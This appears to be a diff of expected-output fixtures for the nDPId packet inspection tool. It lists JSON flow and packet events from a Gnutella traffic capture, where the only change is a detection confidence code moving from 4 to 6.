00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168594,"flow_last_seen":168594,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168594,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":168594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168594,"pkt":"UlQAEjUCCAAn5uVZCABFAABtbeQAAIARLxYKAAIPvsDStnAJGmIAWe\/nYtExAgjn\/Ke847x2NG4oVEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168594,"flow_last_seen":168594,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168594,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2734,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168594,"flow_last_seen":168594,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168594,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168840,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168840,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":168840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":168840,"pkt":"UlQAEjUCCAAn5uVZCABFAABteiAAAIARB1cKAAIPUc1bLXAJlZkAWXbGOhUxApJjO\/JuqWKA3F9q70QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAADgZnrrTUxbZJrkUeNZFbiSwaUPd"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168840,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168840,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2742,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":168840,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":168840,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":2,"flow_last_seen":168854,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":168854,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB8MAAEAR0rG+wNK2CgACDxpicAkC32qFYtExAgjn\/Ke847x2NG4oVEQAAMACAAAGR1RLRwAAVhpgfx\/FIwIUkbHoonVeeVgxwBsEvsDSthpiAQAAAAQZ71djFEdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegkdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj1dTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABK1XVsEZ16ugW6JpsS4xfhpSq81BEjJ0DmW2UdUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeQ=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":3,"flow_last_seen":174268,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174268,"pkt":"UlQAEjUCCAAn5uVZCABFAABybeUAAIARLxAKAAIPvsDStnAJGmIAXsbRDJkxAiMikaZOqXdSUPahXUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":3,"flow_last_seen":174269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174269,"pkt":"UlQAEjUCCAAn5uVZCABFAAByB2IAAIARDDUKAAIPVoHEVHAJJrsAXjsDcFExAhHLtY5GdmAVhlELQEQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174303,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174303,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":174303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174303,"pkt":"UlQAEjUCCAAn5uVZCABFAAByStEAAIARbHkKAAIPwqO0fnAJKkkAXkeElzExAuaUt3SA\/qxG7F60jUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174303,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174303,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2806,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174303,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174303,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":28681,"dst_port":10825,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2807,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":2,"flow_last_seen":174303,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174303,"pkt":"UlQAEjUCCAAn5uVZCABFAAByVrsAAIARN2oKAAIPxjraDHAJuygAXpm7NG4xAlN4rvcHLSWuyVzKGkQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":3,"flow_last_seen":174321,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174321,"pkt":"UlQAEjUCCAAn5uVZCABFAAByxlcAAIARNIMKAAIPjoSlDXAJd2YAXu8TjWExApO4DvtDKbdx2klNVkQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":174322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174322,"pkt":"UlQAEjUCCAAn5uVZCABFAABy\/iwAAIARW1MKAAIPvBcY1XAJSIEAXn4ZciIxAgUt47TCA6DBC1+HrEQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":174322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174322,"pkt":"UlQAEjUCCAAn5uVZCABFAAByI9AAAIARdPYKAAIPXgg3nnAJx8QAXqKieDQxAq3mE0dDpkvWQzLgPUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174322,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":2,"flow_last_seen":174323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":174323,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB+sAAEAR7N7Co7R+CgACDypJcAkC36eTlzExAuaUt3SA\/qxG7F60jUQAAMACAAAGR1RLRwAAW5ZMJAC\/sp0EyBIYLqaZItjn8QIEwqO0fipJAQAAAAQkVMV3FEdUS0cAAFxg+taEWAYB1unX7flSWQRG3beNBGic4kjQCldTSFIAAFpCOi4aZIiG9lYEyciBumqkMMTzBMY62gy7KEdUS0cAAFf2jq05FgyfJOGIcRJLg6NdtQ1eBLw9NLcuTEdUS0cAAFYaYH8fxSMCFJGx6KJ1XnlYMcAbBL7A0rYaYkdUS0cAAFFI2BA3K8AVe0IqJAEnw9\/D630lBI6EpQ13ZkdUS0cAAFITSOd3gRniYdJwpHJZH2SZ8zLzBFaBxFQmu0dUS0cAAE3VqZZmQu9JEb4xS9XAL1zJJdrgBLwXGNVIgVdTSFIAAEwNRRSjJbzqx43c9rTKLbxkbHgKBF4IN57HxEdUS0cAAElxJg9dajjzW3txW7a4q7j8IGI0BFHNWy2VmUdUS0cAAEE1vJAZC\/Oid7YdKVGKEGbtSapFBJUco6\/DJFdTSFIAAEJDtkelhifx87ftq707Fzo\/U0PdBC+TNBWPeEdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzEdUS0cAAGcZJHUoqfb+iSo9+1Aaw4nAX4zABFAH\/MAa6EdUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mjw=="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":2,"flow_last_seen":174342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174342,"pkt":"UlQAEjUCCAAn5uVZCABFAAByeiEAAIARB1EKAAIPUc1bLXAJlZkAXranfCExAmltWPgHip8OOUDUwEQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174342,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174342,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":174342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174342,"pkt":"UlQAEjUCCAAn5uVZCABFAAByzKsAAIARKPUKAAIPlRyjr3AJwyQAXo4hNNYxAkNtQBP87WWbzy94OkQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174342,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174342,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174342,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174342,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":174343,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174343,"pkt":"UlQAEjUCCAAn5uVZCABFAAByuwkAAIARD7sKAAIPL5M0FXAJj3gAXq06x7YxAq8Sv7XsAP61JE4GfUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 